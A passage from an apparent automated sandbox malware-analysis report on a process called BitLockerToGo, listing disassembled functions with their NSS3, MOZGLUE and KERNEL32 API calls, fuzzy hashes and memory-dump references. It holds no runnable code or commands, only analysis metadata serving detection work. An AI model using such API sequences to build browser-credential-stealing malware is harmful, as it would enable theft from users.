                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Freecalloc$mallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 207547555-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e196b2ffb078359c89fe6ae99a65510f68bb5b0685cf9fcc764ef26ab7ddc83c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ecf01b7e6c6cce41ef91d391e9dc4546371592b10043f9cbd749bdb128a0ea41
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e196b2ffb078359c89fe6ae99a65510f68bb5b0685cf9fcc764ef26ab7ddc83c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B1124B19007909BEB109F65EA8865777E8BB01348F40793AD81E82E01EB30F45CC794
                                                                                                                                                                                                                                                                                                                                                          Function 6C658FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C660710), ref: 6C658FF1
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2158,6C659150,00000000,?,?,?,6C659138,?,6C660710), ref: 6C659029
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000,?,?,6C660710), ref: 6C65904D
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C660710), ref: 6C659066
                                                                                                                                                                                                                                                                                                                                                          • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C660710), ref: 6C659078
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1176783091-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4088f2ba8eb00cc3f0efe53c65c8a99c995484a0be8672b71d42ca527e1f3180
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3ff509341a6d02776c9696b3ce1ca8761ced15c53a6cba59cc7dfca493ff2134
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4088f2ba8eb00cc3f0efe53c65c8a99c995484a0be8672b71d42ca527e1f3180
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F91108B170011157E7201AEDAC04A6A73ACEB827ACFA00939FD49C6B50F757CD66C7A9
                                                                                                                                                                                                                                                                                                                                                          Function 6C66CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681E10: TlsGetValue.KERNEL32 ref: 6C681E36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681E10: EnterCriticalSection.KERNEL32(?,?,?,6C65B1EE,2404110F,?,?), ref: 6C681E4B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C681E10: PR_Unlock.NSS3 ref: 6C681E76
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,6C66D079,00000000,00000001), ref: 6C66CDA5
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,6C66D079,00000000,00000001), ref: 6C66CDB6
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C66D079,00000000,00000001), ref: 6C66CDCF
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C66D079,00000000,00000001), ref: 6C66CDE2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C66CDE9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1720798025-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fc6f14d06cc2f5f4a37fc34b1461b4d452602338dff4bca29d59470d737fb6e5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ea318f38e57c3e1b932ee4360c00be380034eb0347e5623d654ff75651c82148
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc6f14d06cc2f5f4a37fc34b1461b4d452602338dff4bca29d59470d737fb6e5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E611A0B2B01515BBDF00AF66EC45996B77CFB053697100131E91A87E01E732E425C7EA
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6D2CEC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2D02
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2D1F
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2D42
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2D5B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d01c1ec28248adeaa6494a47fc5be1d41c9e9eb4eee876185143034a804223a8
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9501C4F1A002046BE6309E26FC48BC7B7E1EF55318F014525E95A86B20E632FC158796
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C6D5B56
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6D2D9C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2DB2
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C6D2DCF
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2DF2
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C6D2E0B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aac78231cd5b6a8a3990c0c8dcb0c98e659b5cbc353b64605727cc50ba7429bd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C01C4F1A006006FEB309E25FC09BC7B7E1EF55318F010435E95A86B11D632F825879A
                                                                                                                                                                                                                                                                                                                                                          Function 6C66AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C66AE42), ref: 6C6530AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6530C7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C6530E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C653116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C65312B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PK11_DestroyObject.NSS3(?,?), ref: 6C653154
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C653090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65317E
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C6499FF,?,?,?,?,?,?,?,?,?,6C642D6B,?), ref: 6C66AE67
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C6499FF,?,?,?,?,?,?,?,?,?,6C642D6B,?), ref: 6C66AE7E
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C642D6B,?,?,00000000), ref: 6C66AE89
                                                                                                                                                                                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C642D6B,?,?,00000000), ref: 6C66AE96
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C642D6B,?,?), ref: 6C66AEA3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 754562246-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cc319081077ec5dbaa2a1c29b31ea504713abd59fe4e8956a1925e6b0b5297a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e5464c5f7f53afbd1cde1f8d9c140d00d0aedad35c1aaf6da25566d73a6e3fef
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc319081077ec5dbaa2a1c29b31ea504713abd59fe4e8956a1925e6b0b5297a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C201D1A6B0013057E701916EAC81AEF31988B87A5CB080131F906C7F03F715D91A53AF
                                                                                                                                                                                                                                                                                                                                                          Function 6C750930 Relevance: 7.5, APIs: 5, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,6C750C83), ref: 6C75094F
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,6C750C83), ref: 6C750974
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750983
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?,?,6C750C83), ref: 6C75099F
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(?,?,6C750C83), ref: 6C7509B2
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalDebugEnterOutputSectionStringfflushfwrite
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1872382454-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a3be35fcce7f3a4f1c36186b534eab22eeeaabb13ddb6666ae7d06af9fab899
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9e955f1bb6ed851b1d6027d7e66f3596d202f5b1bbf9e32013f91e201a56143f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a3be35fcce7f3a4f1c36186b534eab22eeeaabb13ddb6666ae7d06af9fab899
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 770157B8701250CFEF04AFA8E989B593BB9AB4331DF4C0275E845C3666DF35E460CA11
                                                                                                                                                                                                                                                                                                                                                          Function 6C757C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C757C73
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C757C83
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C757C8D
                                                                                                                                                                                                                                                                                                                                                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C757C9F
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C757CAD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 105370314-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 19fe06c06bbd5d1977c9d60e8d67ba5b2ff11d2222be3814eac3acb028c0e306
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1df25e744d3e7f5328e377d72b6df3ad1cf827458a45a5f82fbd6f8c98285ed4
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19fe06c06bbd5d1977c9d60e8d67ba5b2ff11d2222be3814eac3acb028c0e306
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0F0C2F1A202166FEB009F3A9E0D947779CEF00265B418835E809C7B00EF35E124CBE5
                                                                                                                                                                                                                                                                                                                                                          Function 6C75ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C75A6D8), ref: 6C75AE0D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75AE14
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C75A6D8), ref: 6C75AE36
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75AE3D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,?,6C75A6D8), ref: 6C75AE47
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b87519498d03addf1692a92133ec46ce618787018eab59df5f12fdb2b78eaa9d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fc5a634062cadde02bb78d86c69fa0e35e49b0c2668006b713fb756f7829351f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b87519498d03addf1692a92133ec46ce618787018eab59df5f12fdb2b78eaa9d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49F09675201A01A7CE109F68D909957B77CFF86776754033CE52A83940D731E526C7D5
                                                                                                                                                                                                                                                                                                                                                          Function 6C5DBCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(6C77AAF9,?), ref: 6C5DBE37
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
